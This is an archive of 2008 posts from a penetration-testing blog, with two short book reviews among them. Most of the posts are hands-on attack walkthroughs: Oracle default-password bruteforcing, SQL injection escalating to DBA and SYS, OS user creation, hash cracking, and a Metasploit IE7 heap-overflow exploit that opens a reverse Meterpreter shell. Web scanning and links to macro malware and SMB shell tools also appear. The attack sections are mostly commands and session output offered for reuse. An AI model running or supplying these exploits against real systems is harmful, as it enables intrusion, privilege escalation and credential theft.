Thursday, December 25, 2008

The Truth About Identity Theft Book Review

The Truth About Identity Theft Book Review

by Jim Stickley

4 stars

Witty (Hopefully) Amazon Title: Digestible Truths to Protect Yourself from Identity Theft

When this book showed up (review copy) I initially thought what a piece of garbage. Like a previous commenter said, the book has a lackluster cover and its small and skinny.
BUT, I flipped through and noticed that it contained lots of little "truths" 3-4 pages in length that quickly covered specific topics related to identity theft and protecting yourself online. So I decided to give it a shot.

The book is broken into 9 parts:

Part 1: The Truth About Phishing and Vishing
Part 2: The Truth About Trash
Part 3: The Truth About No-Tech Identity Theft
Part 4: The Truth About Just How Low Identity Thieves Will Go
Part 5: The Truth About Identity Theft in Plain Sight
Part 6: The Truth About Online Cons
Part 7: The Truth About Security at Work
Part 8: The Truth About Identity Theft from Real Victims
Part 9: The Truth About Putting a Stop to Identity Theft

Again, each part consists of several 3-4 page vignettes on topics related to the section and each vignette, while short, yields some actionable information on the topic. I didnt have any specific favorites, they were all good. Just about all of them were real world examples that they author conducted during security assessments or real life examples from people that had contacted the author or stories he had heard. Its sometimes much easier to emphasize with Susan who was a victim of identify theft and the troubles she was having trying to set things right. Of real value was the part on Putting a Stop to Identity Theft which tells you how to get rid of the pre-certified credit card offers, checking your credit reports, actions to take if you are a victim of identity theft and some of the pitfalls that can come up during the process.

So why 4 stars? Well mostly because I review technical security books it wouldn't be fair to give a less technical book that doesn't yield "new" (but still useful) information 5 stars when other more technical books are graded much harsher. So that being said, if I had approached it being a less technical reviewer I would have easily given it 5 stars. If you want to get a book for mom and dad to protect to help them protect themselves from themselves and the rest of the bad guys out there this is the book for them. Unfortunately I finished it too close to Xmas to give copies as gifts.


Monday, December 22, 2008

Oracle Pwnage Part 6 from DBA to SYS

In some of the past posts I covered finding a user default user account or account with an easy to guess username/password for Oracle and taking that user to DBA via SQL Injection in Oracle packages.

I've been neglecting the blog a bit porting some of the public SQLI for Oracle into metasploit auxiliary modules. Not sure when its going to be put into the trunk but it will be at some point, I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, so it being the week of Christmas or whatever you celebrate I thought I'd put out a module that has a vulnerability out but no exploit code.

So...coverage for:

The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.

Let's see it in action. Assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

------------------------------ ------------------------------ --- --- ---

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@ as sysdba

SQL*Plus: Release - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release - Production
With the Partitioning, OLAP and Data Mining options


select user from dual;



Tested on 9i and 10g release 1

codez available here:

It's definitely a work in progress, so if you have feedback, send it.

Missing Add Remove Icon in Windows

Not really security related but notes for me if it comes up again...

Was doing some incident response on a Windows 2003 server, I needed to verify a service pack level and installed KB's via the add remove programs program but the icon was missing.

Found the answer on how to call it via the start-->run-->appwiz.cpl


Thursday, December 11, 2008

Internet Explorer 7 XML Parser Buffer Overflow

So this has been an interesting week. Lots of new botnets to dig around in, a bunch of new malware sites making a new effort to obfuscate their code and one 0day [whatever that means].

A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time it figuring out. It's pretty straight forward though. If you want to know more about how it works then HD Moore has an excellent writeup on it here.

Basically the vuln is in how the SPAN tags format the datasource referenced by the xml to cause a heap corruption. See HD's post for the exact details. Every time I add code to my posts it screws something up. So no code showing this!

Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.

So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an inital PoC working but it was not stable and only triggered on XP as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use it. He also added target detection based on user-agent string. Awesome! Now we can target specific OS versions with the same exploit.

Even though I tested last night and this morning it seemed to be hit or miss with XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate to the heap the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!

We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.

I guess I should do a video of the module since Chris has started that trend but in the interim...

msf > use exploit/windows/browser/ie_xmlparser
sf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
msf exploit(ie_xmlparser) >

[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

[*] Meterpreter session 1 opened ( ->
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >

Working with mc on getting this module to run was educational to say the least. I learned a lot from the debuggging and testing. Cheers mc!!

Now all I need is a target... ;)


IE7 Zero Day Technical Analysis

dean de beer

Sunday, December 7, 2008

Congrats To My Aura Software Security Friends

Just wanted to give a big congrats to my Aura Software Security friends over in New Zealand for the good things I'm hearing about their hacking netscreen talk.

"Netscreen of the Dead: Developing a Trojaned Firmware for Juniper Netscreen Appliances",130061744,339
Publish Post

Monday, November 24, 2008

Metasploit and WMAP

What is WMAP

"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."

Getting it all up & running

Readme is here:

Step 1: Download, patch, and install ratproxy

Code (at time of this posting):

Step 2: Run ratproxy and browse the site you are targeting, this will populate the database you will use/need for wmap.

**You'll need to create the database first.

msf > db_create wmaptest.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: wmaptest.db

Step 3: Run metasploit, load necessary plugins, and run the wmap modules.

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_connect wmaptest.db
[*] Successfully connected to the database
[*] File: wmaptest.db

Show the targets. This is populated by browsing a site with ratproxy.

msf > wmap_targets
[*] Usage: wmap_targets [options]
-h Display this help text
-p Print all available targets
-r Reload targets table
-s [id] Select target for testing

msf > wmap_targets -r
[*] Added. 80 0
[*] Added. 80 0

msf > wmap_targets -p
[*] Id. Host Port SSL
[*] Added. 80 0
[*] Added. 80 0
[*] Done.

Select a target and run the print command again to ensure the right target was selected.

msf > wmap_targets -s 1
Host Port SSL

[*] => 1. 80

[*] 2. 80

[*] Done.

Display the website structure.

msf > wmap_website
[*] Website structure
[*] SSL:0
| web
| | css
| | +------gonav.css
| | web
| | | images
| | | +------storepic_4.jpg
| | | +------storepic_264.jpg
| | | +------20080717105615.jpg
| | | +------storepic_125.jpg
| | +------index.php
| | | pic
| | | | part
| | | | +------index_line_1.gif
| | | +------top_index.gif
| | | +------username.gif
| | | +------tail_bg.gif
| | | +------head_bg.gif
| | | +------login_bg.gif
[*] Done.

[*] Usage: wmap_run [options]
-h Display this help text

-t Show all matching exploit modules

-e Launch exploits against all matched targets

Show the available modules for wmap

msf > wmap_run -t
[*] Loaded auxiliary/scanner/http/wmap_ssl_vhost ...
[*] Loaded auxiliary/scanner/http/frontpage_login ...
[*] Loaded auxiliary/scanner/http/version ...
[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...
[*] Loaded auxiliary/scanner/http/options ...
[*] Loaded auxiliary/scanner/http/frontpage ...
[*] Loaded auxiliary/scanner/http/wmap_file_same_name_dir ...
[*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...
[*] Loaded auxiliary/scanner/http/wmap_files_dir ...
[*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_dir_listing ...
[*] Loaded auxiliary/scanner/http/wmap_replace_ext ...
[*] Loaded auxiliary/scanner/http/writable ...
[*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ...
[*] Loaded auxiliary/scanner/http/wmap_backup_file ...
[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...
[*] Analysis completed in 1.30465912818909 seconds.
[*] Done.

Run wmap, go get a (rum &) coke because the bruteforce directory modules are going to take awhile.

msf > wmap_run -e
[*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against
[*] Error:
[*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against
[*] may not support FrontPage Server Extensions
[*] Launching auxiliary/scanner/http/version WMAP_SERVER against
[*] is running Apache/2.2.3 (CentOS)( Powered by PHP/5.1.6 )
[*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against
[*] >> Exception during launch from auxiliary/scanner/http/wmap_vhost_scanner: The following options failed to validate: DOMAIN.
[*] Launching auxiliary/scanner/http/options WMAP_SERVER against
[*] allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against
[*] is running Apache/2.2.3 (CentOS)
[*] FrontPage not found on [404 Not Found]
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR / against
[-] Blank or default PATH set.
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR /web/ against


msf > wmap_reports
[*] Usage: wmap_reports [options]
-h Display this help text
-p Print all available reports
-s [id] Select report for display

Show available reports.

msf > wmap_reports -p
[*] Id. Created Target (host,port,ssl)

1. Sat Nov 22 22:37:04 -0500 2008,80,0

[*] Done.

Show your report.

msf > wmap_reports -s 1
WMAP REPORT:,80,0 Metasploit WMAP Report [Sat Nov 22 22:37:04 -0500 2008]
WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY NAME: /administrator/ Directory /administrator/ found. [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY NAME: /class/ Directory /class/ found. [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY NAME: /db/ Directory /db/ found. [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY NAME: /error/ Directory /error/ found. [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY NAME: /icons/ Directory /icons/ found. [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY NAME: /includes/ Directory /includes/ found. [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY NAME: /js/ Directory /js/ found. [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY NAME: /manual/ Directory /manual/ found. [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY NAME: /template/ Directory /template/ found. [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY NAME: /upload/ Directory /upload/ found. [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY NAME: /usage/ Directory /usage/ found. [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY NAME: /web/class/ Directory /web/class/ found. [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY NAME: /web/css/ Directory /web/css/ found. [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY NAME: /web/db/ Directory /web/db/ found. [Sat Nov 22 23:01:26 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:26 -0500 2008]
VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
VULNERABILITY DIR_LISTING: /web/web/pic/ Directory /web/web/pic/ discloses its contents. [Sat Nov 22 23:02:40 -0500 2008]
VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
[*] Done.

Finish your pwnage...errr pentest.

Sunday, November 23, 2008

Getting your smartcard to work with Ubuntu

The big bummer of Common Access Cards (CAC) is that there hasnt been a real good solution to get it working in Linux. I've seen it done for OS X but not for Linux. Well the guys over at HR Geeks did a writeup on how to get it working, worth a look if you have made the jump to being full-time Linux.

Oracle Pwnage Part 5 -- Password Cracking with JTR

Thanks to dentonj for pointing out to me their was an Oracle patch for John the Ripper.

I used the john from this site:

cg@segfault:~/evil/john/run$ more oraclehashes

cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

cg@segfault:~/evil/john/run$ ./john --i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.


Saturday, November 22, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 4

Thank MC for this one...

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST


msf auxiliary(brute_login) > info

Name: Oracle bruteforcer for known default accounts.

Version: $Revision:$

Provided by:

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


This module uses a list of well known authentication credentials for
bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable

SID => unbreakable

msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP...
[*] Found user/pass of: SCOTT/TIGER...
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >

Friday, November 21, 2008

Metasploit Adobe util.printf() Client-side Exploit Video

A little video on using the fileformat mixin to exploit the adobe util.printf() vulnerability.

Sorry, no audio. You'll just have to follow along.

Metasploit adobe util.printf() client-side exploit from carnal0wnage on Vimeo.

**P.S. something is jacked on Vimeo and the video is playing 2x too fast. Start the vid, pull the slider back to the beginning and hit play again and it should play at the proper speed. You also click the link below the video for bigger view.

Wednesday, November 19, 2008

Oracle Pwnage Part 3

Sorry no metasploit for this one.


I did get asked how to get the SCOTT/TIGER username and pass. I left a (hint) in the first blog post. But by request here is the link:

Second thing was that you may find yourself with some oracle hashes after some crafty (well not realy) sql queries. Something that probably looks like this:

[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF

There are a couple of crackers, but I like checkpwd from red-database security.

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe DBSNMP:E066D214D5421CCC password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
DBSNMP has weak password DBSNMP

Done. Summary:
Passwords checked : 2
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe SCOTT:F894844C34402B67 password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
SCOTT has weak password TIGER

Done. Summary:
Passwords checked : 9
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 4.5

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe XDB:88D8364765FCE6AF password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
XDB has weak password CHANGE_ON_INSTALL

Done. Summary:
Passwords checked : 3
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1.5

Monday, November 17, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 2

Last post we got to where we could execute SQL queries on the box and were able to see Scott's permissions.

Let's use the SQLI auxiliary modules to see if we can add the DBA privilege to Scott's account.

As you recall....

msf auxiliary(oracle_sql) > run

[*] Sending SQL...


[*] Done...

[*] Auxiliary module execution completed

Let's try to escalate to DBA with the DBMS_EXPORT_EXTENSION exploit (auxiliary module)

msf auxiliary(oracle_sql) > back
msf > use auxiliary/sqli/oracle/

use auxiliary/sqli/oracle/ctxsys_driload

use auxiliary/sqli/oracle/dbms_export_extension

use auxiliary/sqli/oracle/dbms_metadata

use auxiliary/sqli/oracle/lt_findricset

use auxiliary/sqli/oracle/pitrig_truncate

msf > use auxiliary/sqli/oracle/dbms_export_extension

msf auxiliary(dbms_export_extension) > info

Version: $Revision:$

Provided by:


Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

DBA SCOTT no DB user to elevate to DBA.

DBPASS TIGER yes The password to authenticate as.

DBUSER SCOTT yes The username to authenticate as.

RHOST yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


This module will escalate a Oracle DB user to DBA by exploiting an

sql injection bug in the DBMS_EXPORT_EXTENSION package.

msf auxiliary(dbms_export_extension) > set RHOST


msf auxiliary(dbms_export_extension) > set SID
SID =>
msf auxiliary(dbms_export_extension) > run

[*] Sending package...

[*] Done...

[*] Sending body...

[*] Done...

[*] Sending declare...

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(dbms_export_extension) >

Let's check...

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) >
**Same settings as before; check user's roles
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,DBA,NO,YES,NO <--New Privileges :-)
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

Let's add Java privileges to the Scott account

msf auxiliary(oracle_sql) > set SQL "grant javasyspriv to SCOTT"
SQL => grant javasyspriv to SCOTT

msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Done...

[*] Auxiliary module execution completed

Let's check to see if it worked

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"

SQL => select * from user_role_privs

msf auxiliary(oracle_sql) > run

[*] Sending SQL...


<-- Yup it worked :-)

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(oracle_sql) >

From there we can use the oracle_win32 auxiliary module to execute commands

msf > use auxiliary/admin/oracle/oracle_win32
msf auxiliary(oracle_win32) > info

Name: Execute win32 OS commands
Version: $Revision:$

Provided by:


Basic options:

Name Current Setting Required Description

---- ------------- -------- -----------

CMD echo metasploit > %SYSTEMDRIVE%\\unbreakable.txt no The OS command to execute.

DBPASS TIGER yes The password to authenticate as.

DBUSER SCOTT yes The username to authenticate as.

RHOST yes The Oracle host.

RPORT 1521 yes The TNS port.

SID DEMO yes The sid to authenticate with.


This module will create a java class which enables the execution of OS commands.

msf auxiliary(oracle_win32) > set CMD "net user dba P@ssW0rd1234 /add"

CMD => net user dba P@ssW0rd1234 /add

msf auxiliary(oracle_win32) > set SID
SID =>
msf auxiliary(oracle_win32) > set RHOST


msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class...

[*] Done...

[*] Creating MSF procedure...

[*] Done...

[*] Sending command: 'net user dbaa P@ssW0rd1234 /add'

[*] Done...

[*] Auxiliary module execution completed

or you can test you are executing commands with ping

msf auxiliary(oracle_win32) > set CMD "ping"
CMD => ping

msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class...
[*] Done...

[*] Creating MSF procedure...

[*] Done...

[*] Sending command: 'ping'

[*] Done...

[*] Auxiliary module execution completed

msf auxiliary(oracle_win32) >

on the other end, run tcpdump and filter for ICMP.

sudo tcpdump -i eth0 icmp

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode

listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

01:11:26.123515 IP > ICMP echo request, id 0, seq 8192, length 40

01:11:26.343528 IP > ICMP echo reply, id 0, seq 8192, length 40


8 packets captured
8 packets received by filter

0 packets dropped by kernel

For the ninja shit, check out MC's demo text file.

**Issues, you cant see the output of your command, so you have to run stuff that you can see the results of, see the demo text file.

If you care to clean up, just revoke your DBA privileges with the oracle_sql module

"revoke dba from scott"
"revoke javaprivs from scott"

That's it!

Sunday, November 16, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 1

Every so often you come across an open 1521 on a pentest.

1521/tcp open oracle

But what to do? There aren't a ton of what I consider usable Oracle exploits out there, and the ones that are there involve installing a bunch of extra libraries, and we know thats "tough" to do. Thankfully MC has done all the work for us and created the metasploit mixin and modules. **Need help getting the mixin installed? See my file format post.

All the fun is available here:

We start with Oracle version enumeration:

msf > use auxiliary/scanner/oracle/oracle_version
msf auxiliary(oracle_version) > info

Name: Oracle Version Enumeration
Version: $Revision$

Provided by:

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

This module simply queries the TNS listner for the Oracle build.

msf auxiliary(oracle_version) > set RHOSTS
msf auxiliary(oracle_version) > run

[*] Host is running: 32-bit Windows: Version - Production

Next step is to determine the SID that the Oracle instance is running as:

msf > use auxiliary/scanner/oracle/oracle_sid
msf auxiliary(oracle_sid) > info

Name: Oracle SID Enumeration
Version: $Revision$

Provided by:

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

This module simply queries the TNS listner for the SID.

msf auxiliary(oracle_sid) > set RHOSTS
msf auxiliary(oracle_sid) > run

[*] Identified SID for UNLUCKYDB
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >

Next we use the oracle_sql module to execute SQL queries against the database. This is handy to 1) run SQL queries and 2) check privileges if you've managed to find some working passwords (hint):

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) > info

Name: Run simple SQL against the Oracle instance
Version: $Revision:$

Provided by:

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.
SQL select * from v$version no The SQL to execute.

This module will allow for simple sql statements to be execute
against a given oracle instance given the appropriate credentials.

msf auxiliary(oracle_sql) > set RHOST
msf auxiliary(oracle_sql) > set SID UNLUCKYDB
msf auxiliary(oracle_sql) > run

[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[*] Sending SQL...
[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[-] undefined method `prepare' for #
[-] undefined method `each' for nil:NilClass
[*] Done...
[-] Auxiliary failed: NoMethodError undefined method `disconnect' for #
[-] Call stack:
[-] (eval):48:in `run'
[*] Auxiliary module execution completed

WTF! no FTW on that one. A Google of the error oracle 12514, hints at the Oracle instance not being set up correctly. Lets see if we can get some more info. Using (oldie but a goodie) lets see if we get some additional information using the status command:

cg@WPAD:~/evil/db/oracle$ perl status -h
sending (CONNECT_DATA=(COMMAND=status)) to
writing 89 bytes
. .......6.........S. ...........]........(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)
(SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version - Production)(START_DATE=13-11TB-200809:50:24)(SIDNUM=1)(LOGFILE=e:\oracle\ora92\network\log\listener.log)

Let's try it with the service name; UNLUCKYXDB.MYPWN

msf auxiliary(oracle_sql) > set SID UNLUCKYXDB.MYPWN
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Oracle9i Enterprise Edition Release - Production
[*] PL/SQL Release - Production
[*] CORE Production
[*] TNS for 32-bit Windows: Version - Production
[*] NLSRTL Version - Production
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

**Yeah it worked. Now its time to get some more useful info

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Done...
[*] Auxiliary module execution completed

Thats it for part 1, part 2 we'll use some sqli to hopefully bump scott up to DBA and execute some OS commands.


Saturday, November 15, 2008

Blown to Bits: Your Life, Liberty, and Happiness After the Digital Explosion Book Review

Blown to Bits: Your Life, Liberty, and Happiness After the Digital Explosion Book Review
by Hal Abelson, Ken Ledeen, Harry Lewis

4 stars

Witty (Hopefully) Amazon Title: My bits are gone and I want them back!

The authors of Blow to Bits: Your Life, Liberty, and Happiness After the Digital Explosion cover both new and old technologies and how they relate to todays cultural and political climates. Driving home the history of most of the technologies we can't live without and their tumultuous relationship with the legislative and judicial branches of the American government.

Breakdown of the chapters:

Chapter 1: Digital Explosion: Why Is It Happening, and What Is at Stake? 1

Chapter 2: Naked in the Sunlight: Privacy Lost, Privacy Abandoned 19

Chapter 3: Ghosts in the Machine: Secrets and Surprises of Electronic Documents 73

Chapter 4: Needles in the Haystack: Google and Other Brokers in the Bits Bazaar 109

Chapter 5: Secret Bits: How Codes Became Unbreakable 161

Chapter 6: Balance Toppled: Who Owns the Bits? 195

Chapter 7: You Can’t Say That on the Internet: Guarding the Frontiers of Digital Expression 229

Chapter 8: Bits in the Air: Old Metaphors, New Technologies, and Free Speech 259

Conclusion: After the Explosion 295

All the chapters were well written, informative and flow well together. I felt the authors did a great job breaking down the technical concepts behind the technologies well enough to get the required background (technical but not too technical) and then move into the political discussions of those technologies. The real value of the book was the "Your Life, Liberty, and Happiness" portion of the discussions. They discuss how has the world changed now that we are moving away from paper and everything is in bits. Who owns those bits, what is the government and industry allowed to do with those bits and what about privacy in our lives now that very detailed profiles of people can be generated from those bits (especially since we gave that information away for a few cents off at the register or for some "free service")?

There are plenty of books that discuss the 1's and 0's of the concepts but few I have read that talk about the privacy, governmental or cultural issues that arise from those technologies. Like one of the other reviewers(1) mentioned, plenty of "geez whiz" moments along with plenty of other "I cant believe they did that" moments as well. A great read.


Friday, November 14, 2008

Link: Writing malicious maros using metasploit

Good blog post over at securiteam on using the exe2vba portion of metasploit to embed malicious code into office documents. Fun!

of course those attacks can be mitigated with proper group policy but most places "need their macros!" so enjoy the pwnings.

Tuesday, November 11, 2008

Passing the Hash and other fun with Tenable smbshell


smbshell is a pre-compiled NASL script which can be used as a standalone tool to do the following tasks :
  • Navigate thru the remote SMB shares and download files or obtain their version number
  • Read/Enumerate the remote SMB registry
  • Query/Start/Stop/Pause remote services
  • Obtain an interactive shell (cmd.exe) on the remote host


smbshell is a pre-compiled NASL script - therefore, you need to install Nessus 3 first.
To run smbshell, download it and run it thru the 'nasl' command-line utility :
$ /opt/nessus/bin/nasl -t TargetIP smbshell.nbin
